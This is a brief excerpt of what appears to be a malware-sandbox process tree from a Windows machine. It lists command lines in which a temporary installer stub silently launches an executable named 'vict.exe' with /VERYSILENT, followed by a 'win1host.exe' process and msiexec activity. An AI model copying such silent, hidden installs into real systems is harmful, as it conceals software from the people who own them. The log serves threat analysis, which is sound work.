C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5116
-
C:\Users\Admin\AppData\Local\Temp\is-IT6KQ.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-IT6KQ.tmp\vict.tmp" /SL5="$3032A,870426,780800,C:\Users\Admin\AppData\Local\Temp\semb3vsabdh\vict.exe" /VERYSILENT /id=5351⤵PID:5328
-
C:\Users\Admin\AppData\Local\Temp\is-OCBLQ.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-OCBLQ.tmp\win1host.exe" 5352⤵PID:5932
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5300
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CDF962A579BB00C4E3DEF46F4D385511 C2⤵PID:5620
-